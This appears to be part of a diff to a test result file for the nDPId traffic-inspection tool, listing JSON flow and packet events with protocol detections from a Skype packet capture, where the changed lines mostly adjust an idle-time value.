+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1431969675055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQxNAAEAGFgrAqAEinTeCmcOJAbvJCUUsAAAAALAC\/\/85TwAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":880,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675056,"flow_last_seen":1431969675056,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675056,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1431969675056,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675056,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWxNAAEAGY87AqAEib91KL8OKAbuRyk0GAAAAALAC\/\/\/OdwAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":883,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1431969675186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675186,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiGdN4KZwKgBIgG7w4mX7uJ3yQlFLaASOJBqegAAAgQFrAQCCApOtN4hPiMKdQEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1431969675186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675186,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04itAAEAGdv3AqAEinTeCmcOJAbvJCUUtl+7ieIAQECzBIgAAAQEICj4jCvdOtN4h"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1431969675201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675201,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsCidNziSwKgBIgG7w4gH6KF9F4LeCaASOJAKyQAAAgQFrAQCCApNhXK2PiMKdQEDAwk="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1431969675201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675201,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0v5VAAEAG45rAqAEinTc4ksOIAbsXgt4JB+ihfoAQECxhYwAAAQEICj4jCwVNhXK2"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1431969675353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675353,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOVv3UovwKgBIgG7w4qMyvZEkcpNB6ASOJB16gAAAgQFrAQCCApNhWBgPiMKdQEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1431969675353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675353,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0A+1AAEAGuwDAqAEib91KL8OKAbuRyk0HjMr2RYAQECzL7gAAAQEICj4jC5tNhWBg"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAABAarpAAEAGVDDAqAEib91KJsOLnE+UB73TAAAAALAC\/\/+\/fwAAAgQFtAEDAwUBAQgKPiML1gAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5rAwAAEAR7JDAqAEiQTffFTLdnFsAJTYGnEoCYEAkEhPrC3cXaZ2QhtIeOoxIY9w9Ekoojl8="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -504,12 +504,12 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3KwsAAEARbhfAqAEinTeCkjLdgQkAI6nfnE4CnxxG0E+kNYaCqSmEqqaVzyCf2xFtLT6I"} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675567,"flow_last_seen":1431969675567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969675567,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1431969675567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969675567,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoxtNAAEAGPGLAqAEiEaxkJMNoAbucCLSTZ4D+ClAR\/\/\/87QAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1431969675708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675708,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+5v3UomwKgBIpxPw4sbzRl\/lAe91KASOJBx0gAAAgQFrAQCCApNf6NJPiML1gEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":3,"flow_last_seen":1431969675708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675708,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0poBAAEAGGHbAqAEib91KJsOLnE+UB73UG80ZgIAQECzH1wAAAQEICj4jDPtNf6NJ"} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":907,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1431969675716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1431969675716,"pkt":"PBXCt3IO0NQSxnP1CABFAAAoyPJAAPAGikIRrGQkwKgBIgG7w2hngP4KnAi0lFARn\/5c7gAAAAAAAAAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1431969675716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969675716,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoVvpAAEAGrDvAqAEiEaxkJMNoAbucCLSUZ4D+C1AQ\/\/\/87AAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675567,"flow_last_seen":1431969675567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969675567,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1431969675567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969675567,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoxtNAAEAGPGLAqAEiEaxkJMNoAbucCLSTZ4D+ClAR\/\/\/87QAA"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1431969675708,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675708,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+5v3UomwKgBIpxPw4sbzRl\/lAe91KASOJBx0gAAAgQFrAQCCApNf6NJPiML1gEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":3,"flow_last_seen":1431969675708,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675708,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0poBAAEAGGHbAqAEib91KJsOLnE+UB73UG80ZgIAQECzH1wAAAQEICj4jDPtNf6NJ"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":907,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1431969675716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1431969675716,"pkt":"PBXCt3IO0NQSxnP1CABFAAAoyPJAAPAGikIRrGQkwKgBIgG7w2hngP4KnAi0lFARn\/5c7gAAAAAAAAAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1431969675716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969675716,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoVvpAAEAGrDvAqAEiEaxkJMNoAbucCLSUZ4D+C1AQ\/\/\/87AAA"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1431969675950,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969675950,"pkt":"0NQSxnP1PBXCt3IOCABFAABPisQAAEARbGbAqAEiwKgBAdd3ADUAO4zaTRYBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -522,12 +522,12 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1431969676429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969676429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9SBkAAEARs0rAqAEib91NpTLdnFQAKf+JnFIC4bFrPlS3SgwUQ0ZkfJhi4Ibaq\/8x3HMPk6r8UbN8"} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677018,"flow_last_seen":1431969677018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969677018,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1431969677018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969677018,"pkt":"0NQSxnP1PBXCt3IOCABFAABAFnhAAEAGqHLAqAEib91KJsOPAbu0bGHpAAAAALAC\/\/+PWgAAAgQFtAEDAwUBAQgKPiMSEQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677018,"flow_last_seen":1431969677018,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969677018,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1431969677018,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969677018,"pkt":"0NQSxnP1PBXCt3IOCABFAABAFnhAAEAGqHLAqAEib91KJsOPAbu0bGHpAAAAALAC\/\/+PWgAAAgQFtAEDAwUBAQgKPiMSEQAAAAAEAgAA"} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1431969677045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969677045,"pkt":"0NQSxnP1PBXCt3IOCABFAABP37sAAEARF2\/AqAEiwKgBAdd3ADUAO4zaTRYBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":1431969677045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969677045,"pkt":"0NQSxnP1PBXCt3IOCABFAABPvnQAAEAROLbAqAEiwKgBAfaEADUAO+FnvnsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAHAAB"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":936,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1431969677390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969677390,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+5v3UomwKgBIgG7w48O1kHvtGxh6qASOJAkowAAAgQFrAQCCApNf6TaPiMSEQEDAwk="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1431969677390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969677390,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0fWFAAEAGQZXAqAEib91KJsOPAbu0bGHqDtZB8IAQECx6WwAAAQEICj4jE4NNf6Ta"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":936,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1431969677390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969677390,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+5v3UomwKgBIgG7w48O1kHvtGxh6qASOJAkowAAAgQFrAQCCApNf6TaPiMSEQEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1431969677390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969677390,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0fWFAAEAGQZXAqAEib91KJsOPAbu0bGHqDtZB8IAQECx6WwAAAQEICj4jE4NNf6Ta"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 